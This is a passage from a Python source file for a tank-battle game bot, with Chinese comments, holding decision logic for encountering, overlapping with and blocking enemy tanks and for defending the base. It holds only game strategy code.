map_.rollback_to_previous(): if (battler.has_overlapping_enemy() and oppTank is battler.get_overlapping_enemy() ): # 刚刚被对手打破重叠 _justBreakOverlap = True _shouldShoot = False if _justBreakOverlap: # 刚刚被对手主动打破重叠 for _route in battler.get_all_shortest_attacking_routes(): if oppTank.xy in _route: # 对方现在位于我的攻击路线上,说明对方上回合是 _shouldShoot = True # 回头堵路,那么继续保持射击 break if _shouldShoot: # 正常防御 player.set_status(Status.READY_TO_BLOCK_ROAD, Status.READY_TO_FIGHT_BACK) if battler.on_the_same_line_with(oppBattler, ignore_brick=False): player.set_status(Status.OPPOSITE_SHOOTING_WITH_ENEMY) # 保持对射 return battler.shoot_to(oppBattler) else: pass # 否则视为进攻逻辑 # 闪避,尝试找最佳方案 #------------------------- defenseAction = Action.STAY if battler.canShoot: defenseAction = battler.shoot_to(oppBattler) dodgeActions = battler.try_dodge(oppTank) if battler.is_in_enemy_site(): # 限制条件,只有在对方基地才开始闪现! # # 最佳方向是闪避向着进攻方向移动 # attackAction = battler.get_next_attacking_action() for action in dodgeActions: # 与进攻方向相同的方向是最好的 if Action.is_same_direction(action, attackAction): realAction = player.try_make_decision(action) # 风险评估 if Action.is_move(realAction): player.set_status(Status.KEEP_ON_MARCHING, Status.READY_TO_DODGE) return realAction # 闪避加行军 # 没有最佳的闪避方案,仍然尝试闪避 #----------------------------- # 但是不能向着增加攻击线路长短的方向闪避! # route1 = battler.get_shortest_attacking_route() for action in dodgeActions: realAction = player.try_make_decision(action) if Action.is_move(realAction): with map_.simulate_one_action(battler, action): route2 = battler.get_shortest_attacking_route() if route2.length > route1.length: # 不能超过当前路线长度,否则就是浪费一回合 continue else: player.set_status(Status.KEEP_ON_MARCHING, Status.READY_TO_DODGE) return realAction # # 此时还可以考虑借力 # 假设下回合两方对射,如果我方尝试闪避,对方会恰好打掉我方进攻路线上的块,那么就闪避 # if (len(dodgeActions) > 0 # 存在可用的闪避行为 and battler.is_in_enemy_site() # 限制为只有在对方基地才适用这个逻辑 ): _shouldDodge = False action = dodgeActions[0] enemyShootAction = oppBattler.shoot_to(battler) with outer_label() as OUTER_BREAK: with map_.simulate_one_action(battler, action): # 假设闪走 fields = oppBattler.get_destroyed_fields_if_shoot(enemyShootAction) for field in fields: if isinstance(field, BrickField): # 对手会打掉墙 for _route in battler.get_all_shortest_attacking_routes(): if field.xy in _route: # 这个块在某一个最短的攻击路线上 _shouldDodge = True raise OUTER_BREAK if _shouldDodge: for action in dodgeActions: realAction = player.try_make_decision(action) if Action.is_move(realAction): player.set_status(Status.KEEP_ON_MARCHING, Status.READY_TO_DODGE) return realAction # # 没有不能不导致路线变长的办法,如果有炮弹,那么优先射击! # 5ccef443a51e681f0e8e64d8 #----------------------------------- route1 = battler.get_shortest_attacking_route() if Action.is_shoot(defenseAction): player.set_status(Status.READY_TO_FIGHT_BACK) if battler.on_the_same_line_with(oppBattler, ignore_brick=False): # (inserted) 刚刚对射为两回合,该回合尝试闪避敌人,打破僵局 #-------------------------------------------- # 尝试往远处闪避,创造机会 # # 此外,由于敌人这回合必定射击,那么他的炮弹可能会打掉我身后的墙 # 这样的可能会创造一些新的机会。有的时候导致该回合必须要与敌人对射的原因,可能是因为 # 没有办法开辟攻击路线,而不是敌人堵路。由于闪避的方向是不允许的,也就是另一个更近的 # 闪避反向上必定是一个无法摧毁也不能移动到的块,否则会被与先摧毁。 # 此时如果可以往背离敌人的方向移动,那么应该不会陷入对射僵局。但事实上是进入了 # 这就说明别离敌人的方向是无法移动到的。如果它恰好是一块土墙,那么就可以靠这回合和敌人接力 # 来摧毁掉,也许还有往下移动的可能。 5ce429fad2337e01c7a5cd61 # if (player.has_status_in_previous_turns(Status.OPPOSITE_SHOOTING_WITH_ENEMY, turns=4) and Action.is_stay(player.get_previous_action(back=1)) # 检查对应的两个冷却回合是停止 and Action.is_stay(player.get_previous_action(back=3)) # 避免将移动对射的情况被考虑进来 and Action.is_stay(oppPlayer.get_previous_action(back=1)) and Action.is_stay(oppPlayer.get_previous_action(back=3)) and battler.is_in_enemy_site() # 添加必须在对方地盘的限制,避免在我方地盘放人 and player.has_status(Status.AGGRESSIVE) # 只有侵略性的状态可以打破僵局 ): for action in battler.try_dodge(oppBattler): if Action.is_move(action): realAction = player.try_make_decision(action) if Action.is_move(realAction): player.set_status(Status.READY_TO_DODGE) # 这里还是再判断一下距离 route1 = battler.get_shortest_attacking_route() with map_.simulate_one_action(battler, action): route2 = battler.get_shortest_attacking_route() if route2.length > route1.length: player.set_status(Status.WILL_DODGE_TO_LONG_WAY) return realAction # 默认是优先射击 player.set_status(Status.OPPOSITE_SHOOTING_WITH_ENEMY) return defenseAction # 如果不能射击,那么终究还是要闪避的 # 或者是无法后方移动,为了打破僵局,尝试闪避 #---------------------------------- for action in dodgeActions: realAction = player.try_make_decision(action) if Action.is_move(realAction): player.set_status(Status.KEEP_ON_MARCHING, Status.READY_TO_DODGE) # # 因为这种情况很有可能会出现死循环 5cd009e0a51e681f0e8f3ffb # 为了后续能够打破这种情况,这里额外添加一个状态进行标记 # player.set_status(Status.WILL_DODGE_TO_LONG_WAY) return realAction if Action.is_stay(defenseAction): # # 其实还有一种情况,那就是危险的敌人在自己身上! 5ceaaacdd2337e01c7adf6a4 # riskyEnemyBattler = player.get_risky_enemy() if (riskyEnemyBattler is not None and riskyEnemyBattler is not oppBattler and riskyEnemyBattler.xy == battler.xy ): # 这种情况下实际是没有威胁的 ... for action in dodgeActions: player.set_status(Status.KEEP_ON_MARCHING, Status.READY_TO_DODGE) # TODO: # 还需要判断是否向远路闪避 ... # 这里的细节还需要优化,或者这个和自己重叠的条件在前面就要穿插进去 return action player.set_status(Status.DYING) # 否则就凉了 ... return defenseAction return Action.STAY # 防御模式 #---------- # 1. 如果对方下回合必死,那么射击 # 2. 优先堵路,距离远则尝试逼近 # 3. 必要的时候对抗 # 4. 距离远仍然优先 # # elif status == DEFENSIVE_STATUS: # attackAction = self.try_make_decision(battler.get_next_attacking_action()) # 默认的侵略行为 elif status == Status.DEFENSIVE: if not oppBattler.canShoot: if len( oppBattler.try_dodge(battler) ) == 0: if battler.canShoot: # 必死情况 player.set_status(Status.READY_TO_KILL_ENEMY) return battler.shoot_to(oppBattler) # # 不能马上打死,敌人又无法攻击 #------------------------------- # 优先堵路,根据双方距离判断 # _route = battler.get_route_to_enemy_by_move(oppBattler) if _route.is_not_found(): _route = battler.get_route_to_enemy_by_move(oppBattler, block_teammate=False) assert not _route.is_not_found(), "route not found ?" # 必定能找到路! assert _route.length > 0, "unexpected overlapping enemy" if _route.length == 1: # 双方相邻,选择等待 # 此处首先延续一下对射状态 if (player.has_status_in_previous_turns(Status.OPPOSITE_SHOOTING_WITH_ENEMY, turns=1) # 上回合正在和对方对射 and not battler.canShoot # 但是我方本回合不能射击 and not oppBattler.canShoot # 并且对方本回合不能射击 ): player.set_status(Status.OPPOSITE_SHOOTING_WITH_ENEMY) # 保持对射状态,用于后方打破僵持 player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY elif _route.length > 2: # 和对方相隔两个格子以上 if player.is_safe_to_close_to_this_enemy(oppBattler): # 可以安全逼近 action = battler.move_to(oppBattler) player.set_status(Status.READY_TO_BLOCK_ROAD) # 可以认为在堵路 ... return action else: player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY # 否则只好等额爱 else: # _route.length == 2: # 相距一个格子,可以前进也可以等待,均有风险 #---------------------------------------- # 1. 如果对方当前回合无法闪避,下一回合最多只能接近我 # - 如果对方下回合可以闪避,那么我现在等待是意义不大的,不如直接冲上去和他重叠 # - 如果对方下回合仍然不可以闪避,那么我就选择等待,反正它也走不了 # 2. 如果对方当前回合可以闪避,那么默认冲上去和他重叠 # - 如果我方可以射击,那么对方应该会判定为闪避,向两旁走,那么我方就是在和他逼近 # - 如果我方不能射击,对方可能会选择继续进攻,如果对方上前和我重叠,就可以拖延时间 # # TODO: # 好吧,这里的想法似乎都不是很好 ... # 能不防御就不防御,真理 ... # """if len( oppBattler.try_dodge(battler) ) == 0: # 对手当前回合不可闪避,当然我方现在也不能射击。现在假设他下一步移向我 action = oppBattler.move_to(battler) # 对方移向我 if map_.is_valid_move_action(oppBattler, action): map_.simulate_one_action(oppBattler, action) # 提交模拟 if len( oppBattler.try_dodge(battler) ) == 0: # 下回合仍然不可以闪避,说明可以堵路 map_.revert() player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY map_.revert() # 否则直接冲上去 if player.is_safe_to_close_to_this_enemy(oppBattler): # 可以安全移动 moveAction = battler.move_to(oppBattler) player.set_status(Status.READY_TO_BLOCK_ROAD) # 可以认为在堵路 return moveAction else: # 冲上去不安全,那就只能等到了 player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY else: # 对手当前回合可以闪避,那么尝试冲上去和他重叠 # TODO: # 可能弄巧成拙 5cca97a4a51e681f0e8ad227 # # 这个问题需要再根据情况具体判断! # ''' if player.is_safe_to_close_to_this_enemy(oppBattler): # 可以安全重叠 moveAction = battler.move_to(oppBattler) player.set_status(Status.READY_TO_BLOCK_ROAD) return moveAction else: # 有风险,考虑等待 player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY ''' # # TODO: # 是否应该根据战场情况进行判断,比如停下来堵路对方一定无法走通? # # 假设自己为钢墙然后搜索对方路径? # player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY""" player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY # 似乎没有比这个这个更好的策略 ... # 对方可以射击 else: if battler.canShoot: # 优先反击 player.set_status(Status.READY_TO_FIGHT_BACK) if battler.on_the_same_line_with(oppBattler, ignore_brick=False): player.set_status(Status.OPPOSITE_SHOOTING_WITH_ENEMY) # 触发对射状态 return battler.shoot_to(oppBattler) # 不能反击,只好闪避 actions = battler.try_dodge(oppBattler) if len(actions) == 0: player.set_status(Status.DYING) # 凉了 ... action = Action.STAY elif len(actions) == 1: action = player.try_make_decision(actions[0]) else: # len(actions) == 2: action = player.try_make_decision(actions[0], player.try_make_decision(actions[1])) if Action.is_move(action): # 统一判断 player.set_status(Status.READY_TO_DODGE) return action # 否则就凉了 ... player.set_status(Status.DYING) return Action.STAY # # 回撤模式 #------------ # 1. 优先回撤 # 2. 如果处在守卫状况,根据所处位置,选择反击或堵路 # elif status == Status.WITHDRAW: base = map_.bases[battler.side] if not battler.is_closest_to(base): with player.create_snapshot(): decision = WithdrawalDecision(player, signal) action = decision.make_decision() if decision.is_handled(action): with map_.simulate_one_action(battler, action): if oppTank not in battler.get_enemies_around(): # 安全行为 return # 留给 withdraw 处理 else: # 现在我方坦克已经处在基地附近 with player.create_snapshot(): decision = BaseDefenseDecision(player, signal) action = decision.make_decision() if decision.is_handled(action): # 符合 base defense 的条件 with map_.simulate_one_action(battler, action): if oppTank not in battler.get_enemies_around(): # 安全行为 return # 留给 base defense # # 否则就是不安全行为,应该予以反击 # if battler.canShoot: player.set_status(Status.READY_TO_FIGHT_BACK) return battler.shoot_to(oppBattler) elif oppBattler.canShoot: # 否则应该闪避 for action in battler.try_dodge(oppBattler): player.set_status(Status.READY_TO_DODGE) return action if oppBattler.canShoot: player.set_status(Status.DYING) # 不然就凉了 ... # 最后就等待 return Action.STAY #{ END 'decision/single/encount_enemy.py' }# #{ BEGIN 'decision/single/overlapping.py' }# class OverlappingDecision(SingleDecisionMaker): """ 与敌人重合时的决策 ------------------------ 侵略模式 -------- 1. 直奔对方基地,有机会就甩掉敌人 防御模式 -------- 1. 尝试回退堵路 2. 对于有标记的敌人,考虑采用其他的策略,例如尝试击杀敌军 多回合僵持后,会有主动打破重叠的决策 """ def _make_decision(self): player = self._player signal = self._signal map_ = player._map tank = player.tank battler = player.battler Tank2Player = type(player) BattleTank = type(battler) if battler.has_overlapping_enemy(): player.set_status(Status.ENCOUNT_ENEMY) player.set_status(Status.OVERLAP_WITH_ENEMY) oppTank = battler.get_overlapping_enemy() oppBattler = BattleTank(oppTank) oppPlayer = Tank2Player(oppBattler) if not player.has_status(Status.WITHDRAW): _allowWithdraw = ( WithdrawalDecision.ALLOW_WITHDRAWAL and not player.has_label(Label.DONT_WITHDRAW) ) status = evaluate_aggressive(battler, oppBattler, allow_withdraw=_allowWithdraw) player.set_status(status) else: status = Status.DEFENSIVE # 看作是防御 # # 先检查对方上回合是否在跟随我移动,以及时切换决策模式 ... # 5cd3f56d86d50d05a0083621 / 5ccec5a6a51e681f0e8e46c2 / 5ce26520d2337e01c7a3ca2b #------------------------------- if (player.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY, turns=1) and Action.is_move(player.get_previous_action(back=1)) ): oppPlayer.add_labels(Label.BREAK_OVERLAP_SIMULTANEOUSLY) if (oppPlayer.has_label(Label.BREAK_OVERLAP_SIMULTANEOUSLY) and player.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY, turns=3) and all( Action.is_stay(player.get_previous_action(_back)) for _back in range(1, 3+1) ) ): # 如果和一个带有跟随重叠标记的敌人僵持超过 3 回合,就把这个标记移除,因为它此时已经不是一个会和我马上打破重叠的敌人了 oppPlayer.remove_labels(Label.BREAK_OVERLAP_SIMULTANEOUSLY) # 5ce3c990d2337e01c7a54b4c if (oppPlayer.has_label(Label.BREAK_OVERLAP_SIMULTANEOUSLY) and Action.is_shoot(player.get_previous_action(back=1)) and Action.is_shoot(oppPlayer.get_previous_action(back=1)) # TODO: 是否有必要判断射击方向相同? ): # 如果和一个带有跟随重叠标记的敌人在同一回合采用射击的方式打破重叠,则对这个行为进一步标记 oppPlayer.add_labels(Label.SIMULTANEOUSLY_SHOOT_TO_BREAK_OVERLAP) # # (inserted) 如果敌人带有立即打破重叠的标记,那么如果还能执行到这个地方,就意味着敌人 # 上次打破重叠的方向是回防(如果是进攻,那么应该不会再有机会遭遇) # # 那么在此处重新进入重叠的时候,尝试将对手击杀 # if not status == Status.DEFENSIVE: # 防御模式不触发? if (oppPlayer.has_label(Label.IMMEDIATELY_BREAK_OVERLAP_BY_MOVE) and not player.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY) # 上回合不重叠 ): action = battler.get_next_attacking_action() if Action.is_move(action): if battler.canShoot: player.set_status(Status.READY_TO_BREAK_OVERLAP, Status.ATTEMPT_TO_KILL_ENEMY) return action + 4 # # (inserted) 观察到大多数人在遇到重叠时会选择直接无视对手,我们也可以学习一下这种决策 # 但是目前不想让这个决策成为必须,希望它只在特定的状况下被触发。 # # 对于非防御模式下,考虑这样三种情况: # ------------------------------------- # 1. 假设我方当前进攻路线距离领先一步 ,如果对方主动打破重叠,这时,如果对方下一步可以闪避, # 而我方当前回合不饿能闪避,必须要还击(之所以必须要射击是因为我们考虑最坏的情况,假设 # 对方这回合会还击,如果我方这时候不还击就会被打掉),假如对方这回合闪避了,并且恰好沿着进攻 # 方向闪避,那么结束后对方将比我方领先一步,这时候即使再继续攻击,结局也很可能是输, # 因此这步可以考虑主动打破重叠 # # 2. 假设我方当前进攻路线长度与敌方相同,假设对方主动打破重叠,假设对方可以闪避并且可以向着 # 进攻方向闪避,那么对方很有可能比我方快一步,此时应该主动打破重叠。假如对方不能向着进攻方向 # 闪避,那么认为敌人一定会还击,此时考虑我方下回合是否可以向着进攻方向闪避,如果不可以的话, # 我方就和对方差一步,处于劣势,那么就主动打破重叠。 # # 3. 假设对方比我方领先一步,这种情况下多属于对方处在我方阵营,我方很可能会触发防御模式 # 这种情况下就直接忽略掉吧 # route1 = battler.get_shortest_attacking_route() route2 = oppBattler.get_shortest_attacking_route() _shouldActiveBreakOverlap = False _enemyAttackAction = Action.STAY if route1.is_not_found() or route2.is_not_found(): # 虽然应该不可能,但是还是判断一下 pass else: _leadingLength = route2.length - route1.length # 我方领先步数 debug_print(battler, _leadingLength) action = battler.get_next_attacking_action(route1) if Action.is_shoot(action): # TODO: # 是否有必要考虑射击行为? pass elif _leadingLength == 1: # 情况一 allRoutes = oppBattler.get_all_shortest_attacking_routes() # # 由于不同的路线下一步可能会走到相同的地方,而造成的结果相同 # 因此此处将相同的行为进行缓存,为了减少判断次数 _consideredActions = set() for route in allRoutes: _enemyAttackAction = oppBattler.get_next_attacking_action(route) if _enemyAttackAction in _consideredActions: continue _consideredActions.add(_enemyAttackAction) if not Action.is_move(_enemyAttackAction): # 只考虑移动行为,因为,假如对方当前回合射击,那么我方下回合可以移动 # 这时双方距离可以认为相等,很有可能平局 continue # 提交地图模拟这步行为,这个时候双方应该均为僵持 with map_.simulate_one_action(oppBattler, _enemyAttackAction): # 考虑下回合我方是否可以闪避 with player.create_snapshot(): # 确保这种情况下决策不会再运行到这里,因为此时将不再和敌人重叠,于是不会遇到递归无终点 action, _ = player.make_decision(signal=signal) if action != battler.shoot_to(oppBattler): # 说明下回合我方可以闪避,那么就可以不管了 continue # 我方下回合不可以闪避,考虑敌人下回合是否可以闪避 with oppPlayer.create_snapshot(): action, _ = oppPlayer.make_decision() if action != oppBattler.shoot_to(battler): # 说明下回合敌人可以闪避 _shouldActiveBreakOverlap = True break elif _leadingLength == 0: # 情况二 allRoutes = oppBattler.get_all_shortest_attacking_routes() _consideredActions = set() for route in allRoutes: _enemyAttackAction = oppBattler.get_next_attacking_action(route) if _enemyAttackAction in _consideredActions: continue _consideredActions.add(_enemyAttackAction) if not Action.is_move(_enemyAttackAction): # TODO: # 仍然不考虑射击?为了防止无迭代终点? continue # 提交一步模拟,敌方应该比我方领先一步 with map_.simulate_one_action(oppBattler, _enemyAttackAction): # 考虑下回合敌方是否可以闪避 with oppPlayer.create_snapshot(): action, _ = oppPlayer.make_decision() if action != oppBattler.shoot_to(battler): # 敌方可以闪避 _shouldActiveBreakOverlap = True break # 对方下回合不可以闪避,那么考虑我方是否可以闪避 with player.create_snapshot(): action, _ = player.make_decision() # TODO: # 我方下回合可能是防御状态,这种情况下必定反击,判断不准确 # # 不过问题其实不大,因为这样就会触发主动打破重叠 # if action == battler.shoot_to(oppBattler): # 我方不能闪避 _shouldActiveBreakOverlap = True break else: # 其他情况,留作下一回合打破重叠 pass if _shouldActiveBreakOverlap: action = battler.get_next_attacking_action(route1) if Action.is_move(action): if player.is_safe_to_break_overlap_by_move(action, oppBattler): player.set_status(Status.READY_TO_BREAK_OVERLAP) player.set_status(Status.KEEP_ON_MARCHING) return action elif Action.is_shoot(action): # # 假设下一步射击,考虑最糟糕的一种情况,那就是敌人同一回合主动打破重叠,移动到我方身后 # 而我方无法闪避,那么就有被敌人击杀的风险 # _mayBeKilled = False with map_.simulate_one_action(oppBattler, _enemyAttackAction): with map_.simulate_one_action(battler, action): if len(battler.try_dodge(oppBattler)) == 0: # 无法闪避! _mayBeKilled = True if not _mayBeKilled: # 在没有被击杀风险的情况下可以采用射击 return action # 是否已经有多回合僵持,应该主动打破重叠 _shouldBreakOverlap = ( battler.canShoot # 可以射击 and player.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY, turns=1) ) # 上回合重叠这回合还重叠,就视为僵持,趁早打破重叠 if status == Status.AGGRESSIVE: # 对方不能射击,对自己没有风险,或者是符合了主动打破重叠的条件 if not oppBattler.canShoot or _shouldBreakOverlap: # 尝试继续行军 action = battler.get_next_attacking_action() if Action.is_move(action): if _shouldBreakOverlap: # # 首先先处理主动打破重叠的情况的情况 # 该情况下会改用定制的安全性测试函数判断情况 # # TODO: # 优先尝试不往上回合已经移动过的方向移动 5ce26520d2337e01c7a3ca2b # realAction = action # # 如果遇到和我打破重叠时机一致的对手 #------------------- # 1. 尝试换一个方向移动 # 2. 如果不能换方向,那么可能在狭道内,那么退回原来的位置, # 这意味着如果敌人下回合开炮,那么他必死 5ce264c2d2337e01c7a3c9f6 # if oppPlayer.has_label(Label.BREAK_OVERLAP_SIMULTANEOUSLY): # # 禁止的行为不一定是反向!因为可能恰好遇到拐弯 ... # 5ce48707d2337e01c7a641b7 / 5ce487a6d2337e01c7a64205 # _backTurn = 0 previousAction = Action.STAY while Action.is_stay(previousAction): # 有可能上回合是等待,也就是 _backTurn += 1 # 上回合又下方决策得到,因此需要一直回查到移动行为 previousAction = player.get_previous_action(back=_backTurn) forbiddenAction = action revertMoveAction = (previousAction + 2) % 4 # 反向移动的行为 # # 尝试移向其他的方向 # # TODO: # 太难判断了,还是暂时先禁止把 ... 鬼知道对面怎么算的距离 # '''if realAction == forbiddenAction: route1 = battler.get_shortest_attacking_route() for optionalAction in battler.get_all_valid_move_actions(): if (optionalAction == forbiddenAction or optionalAction == revertMoveAction # 不要回头 ): continue with map_.simulate_one_action(battler, optionalAction): route2 = battler.get_shortest_attacking_route() if route2.length <= route1.length: # 移动后不增加攻击距离s realAction = optionalAction break''' # # 尝试反向移动 # # TODO: # 事实上反向移动也不一定是正确的,因为每一个人对于这种情况的判断是不一样的 # 5ce4943ed2337e01c7a64cdd # '''if realAction == forbiddenAction: with map_.simulate_one_action(battler, revertMoveAction): if len(oppBattler.try_dodge(battler)) == 0: # 如果这回合他反向射击,那么必死 realAction = revertMoveAction''' # # 否则等待,让敌人开一炮,这样下回合还会继续触发移动 # 有可能换一个敌方就可以有别的决策方法 # 也有可能直接带到基地 5ce48b77d2337e01c7a644e5 # if realAction == forbiddenAction: player.set_status(Status.OVERLAP_WITH_ENEMY) # 保持等待状况 return Action.STAY if player.is_safe_to_break_overlap_by_move(realAction, oppBattler): player.set_status(Status.READY_TO_BREAK_OVERLAP) player.set_status(Status.KEEP_ON_MARCHING) return realAction else: # 无法安全移动,但是又需要打破重叠,那么就视为防御 # 让后续的代码进行处理 player.remove_status(Status.AGGRESSIVE) player.set_status(Status.DEFENSIVE) pass # 这里会漏到 DEFENSIVE else: # 开始处理常规情况 realAction = player.try_make_decision(action) if Action.is_move(realAction): # 继续起那就 player.set_status(Status.KEEP_ON_MARCHING) return realAction # 否则就是等待了,打得更有侵略性一点,可以尝试向同方向开炮! realAction = player.try_make_decision(action + 4) if Action.is_shoot(realAction): player.set_status(Status.KEEP_ON_MARCHING) return realAction elif Action.is_shoot(action): # 下一步预计射击 realAction = player.try_make_decision(action) if Action.is_shoot(realAction): player.set_status(Status.KEEP_ON_MARCHING) return realAction else: # 否则停留 player.set_status(Status.KEEP_ON_OVERLAPPING) return Action.STAY else: player.set_status(Status.KEEP_ON_OVERLAPPING) return Action.STAY # 原地等待 if status == Status.DEFENSIVE or _shouldBreakOverlap: # 对方不能射击,对自己没有风险,或者是符合了主动打破重叠的条件 if not oppBattler.canShoot or _shouldBreakOverlap: # # 这里不只思考默认的最优路径,而是将所有可能的最优路径都列举出来 # 因为默认的最优路径有可能是破墙,在这种情况下我方坦克就不会打破重叠 # 这就有可能错失防御机会 # for enemyAttackRoute in oppBattler.get_all_shortest_attacking_routes(): oppAction = oppBattler.get_next_attacking_action(enemyAttackRoute) # 模拟对方的侵略性算法 if Action.is_move(oppAction) or Action.is_shoot(oppAction): # 大概率是移动 # 主要是为了确定方向 oppAction %= 4 # 首先先检查对方是否会跟随我 #-------------------------- # 1. 如果我方可以射击,对方不能射击,那么按照之前的经验,对方下回合会移动 # 这个时候尝试击杀 # if oppPlayer.has_label(Label.BREAK_OVERLAP_SIMULTANEOUSLY): if battler.canShoot: # 这回合可以射击,则改为射击 if (oppPlayer.has_label(Label.SIMULTANEOUSLY_SHOOT_TO_BREAK_OVERLAP) and oppBattler.canShoot # 如果带有这个标记,那么这回合就不要射击了,等待敌人打完这回合, ): # 下回合才有可能击杀 5ce50cd9d2337e01c7a6e45a player.set_status(Status.KEEP_ON_OVERLAPPING) return Action.STAY else: # 否则就考虑反身射击 player.set_status(Status.READY_TO_BREAK_OVERLAP, Status.ATTEMPT_TO_KILL_ENEMY) # 尝试击杀敌军 return oppAction + 4 else: pass # 均不能射击,那么将判定为没有风险。那就一起移动 # 正常情况下选择堵路 #---------------------- if player.is_safe_to_break_overlap_by_move(oppAction, oppBattler): # 模仿敌人的移动方向 player.set_status(Status.READY_TO_BREAK_OVERLAP) player.set_status(Status.READY_TO_BLOCK_ROAD) # 认为在堵路 return oppAction # 否则等待 player.set_status(Status.READY_TO_BLOCK_ROAD) player.set_status(Status.KEEP_ON_OVERLAPPING) return Action.STAY #{ END 'decision/single/overlapping.py' }# #{ BEGIN 'decision/single/base_defense.py' }# class BaseDefenseDecision(SingleDecisionMaker): """ 主动防守基地 --------------------- 现在没有和敌人正面相遇,首先先处理一种特殊情况 在敌人就要攻击我方基地的情况下,应该优先移动,而非预判击杀 这种防御性可能会带有自杀性质 若敌人当前回合正面对我方基地 ---------------------------- 1. 敌人当前回合炮弹冷却,下回合射向我方基地,如果我方坦克下一步可以拦截,那么优先移动拦截 2. 敌人当前回合可以射击,我方坦克下一步可以拦截,那么自杀性拦截 3. 敌人当前回合炮弹冷却,下回合射向我方基地,而我方坦克需要两步才能拦截,那么自杀性拦截 若敌人下一回合可以面对我方基地 ---------------------------- 1. 此时敌人必定可以射击,如果我方坦克在这一步可以优先移动到拦截的位置,那么优先移动 """ def _make_decision(self): player = self._player map_ = player._map battler = player.battler for oppBattler in [ _oppPlayer.battler for _oppPlayer in player.opponents ]: if oppBattler.destroyed: continue # # 敌人当前回合面向基地 # if oppBattler.is_face_to_enemy_base(): if oppBattler.canShoot: # 敌方可以射击 for action in battler.get_all_valid_move_actions(): with map_.simulate_one_action(battler, action): if not oppBattler.is_face_to_enemy_base(): # 此时不再面向我方基地,为正确路线 player.set_status(Status.SACRIFICE_FOR_OUR_BASE) return action else: # 敌方不可射击 for action in battler.get_all_valid_move_actions(): # 敌方不能射击,我方尝试移动两步 with map_.simulate_one_action(battler, action): if not oppBattler.is_face_to_enemy_base(): # 一步防御成功 player.set_status(Status.BLOCK_ROAD_FOR_OUR_BASE) return action else: # 尝试两步拦截 if map_.is_valid_move_action(battler, action): # 需要先预判是否合理 with map_.simulate_one_action(battler, action): if not oppBattler.is_face_to_enemy_base(): # 两步拦截成功 player.set_status(Status.SACRIFICE_FOR_OUR_BASE) return action else: # # 敌人下一回合可能面向基地 # for enemyAction in oppBattler.get_all_valid_move_actions(): with map_.simulate_one_action(oppBattler, enemyAction): if oppBattler.is_face_to_enemy_base(): # 敌人移动一步后面向我方基地 for action in battler.get_all_valid_move_actions(): with map_.simulate_one_action(battler, action): if not oppBattler.is_face_to_enemy_base(): # 我方优先移动可以阻止 player.set_status(Status.BLOCK_ROAD_FOR_OUR_BASE) return action #{ END 'decision/single/base_defense.py' }# #{ BEGIN 'decision/single/behind_brick.py' }# class BehindBrickDecision(RespondTeamSignalDecisionMaker): """ 适用于在墙后和敌人僵持时的情况 """ HANDLED_SIGNALS = ( Signal.PREPARE_FOR_BREAK_BRICK, Signal.READY_TO_BACK_AWAY_FROM_BRICK, ) def _make_decision(self): player = self._player signal = self._signal battler = player.battler BattleTank = type(battler) # 准备破墙信号 #-------------------------- # 触发条件: # # 1. 对应于双方对峙,我方开好后路后触发某些条件强制破墙 # 2. 对方刚刚从墙后移开,我方存在后路,这个时候强制破墙 # # 收到这个信号的时候,首先检查是否可以闪避 # # 1. 如果可以闪避,就返回可以破墙的信号 # 2. 如果不可以闪避,就返回这回合准备后路的信号 # if signal == Signal.PREPARE_FOR_BREAK_BRICK: attackAction = battler.get_next_attacking_action() # 只考虑攻击路径上的敌人 oppTank = battler.get_enemy_behind_brick(attackAction, interval=-1) '''_undoRevertTurns = 0 while oppTank is None: # 对应于敌方刚离开的那种触发条件 # 可能存在多轮回滚,因为别人的策略和我们的不一样! # 给别人回滚的时候必须要考虑多回合! map_.revert() _undoRevertTurns += 1 oppTank = battler.get_enemy_behind_brick(attackAction, interval=-1)''' if oppTank is None: # # 墙后敌人并不一定处于攻击路径之后! 5ce3d1c0d2337e01c7a554e3 # 在这种情况下应该取消考虑这种情况 # res = ( Action.INVALID, Signal.UNHANDLED ) else: player.set_status(Status.WAIT_FOR_MARCHING) # 用于下回合触发 player.set_status(Status.HAS_ENEMY_BEHIND_BRICK) # 用于下回合触发 player.set_risky_enemy(oppTank) # 重新设置这个敌人! dodgeActions = battler.try_dodge(oppTank) if len(dodgeActions) == 0: # 准备凿墙 breakBrickActions = battler.break_brick_for_dodge(oppTank) if len(breakBrickActions) == 0: # 两边均不是土墙 res = ( Action.STAY, Signal.CANHANDLED ) # 不能处理,只好等待 else: player.set_status(Status.READY_TO_PREPARE_FOR_BREAK_BRICK) res = ( breakBrickActions[0], Signal.READY_TO_PREPARE_FOR_BREAK_BRICK ) else: # 可以闪避,那么回复团队一条消息,下一步是破墙动作 shootAction = battler.shoot_to(oppTank) player.set_status(Status.READY_TO_BREAK_BRICK) res = ( shootAction, Signal.READY_TO_BREAK_BRICK ) '''for _ in range(_undoRevertTurns): map_.undo_revert()''' return res # 必定回复一个信号 # # 准备回退以制造二打一的局面 # if signal == Signal.SUGGEST_TO_BACK_AWAY_FROM_BRICK: attackAction = battler.get_next_attacking_action() # 只考虑攻击路径上的敌人 oppTank = battler.get_enemy_behind_brick(attackAction, interval=-1) if oppTank is None: # ?? res = ( Action.INVALID, Signal.UNHANDLED ) else: player.set_status(Status.HAS_ENEMY_BEHIND_BRICK) action = battler.back_away_from(oppTank) realAction = player.try_make_decision(action) if Action.is_move(realAction): player.set_status(Status.READY_TO_BACK_AWAY_FROM_BRICK) res = ( realAction, Signal.READY_TO_BACK_AWAY_FROM_BRICK ) else: # 存在风险,也就是想要夹击的敌人有炮弹,那么就先等待一回合 res = ( Action.STAY, Signal.CANHANDLED ) return res # 必定回复一个信号 #{ END 'decision/single/behind_brick.py' }# #{ BEGIN 'decision/single/follow_enemy_behind_brick.py' }# class FollowEnemyBehindBrickDecision(SingleDecisionMaker): """ 跟随墙后敌人的逻辑 ----------------- 如果上回合敌人和我方隔墙僵持,然后敌人向两侧移动,为了防止敌人从旁边的墙突破, 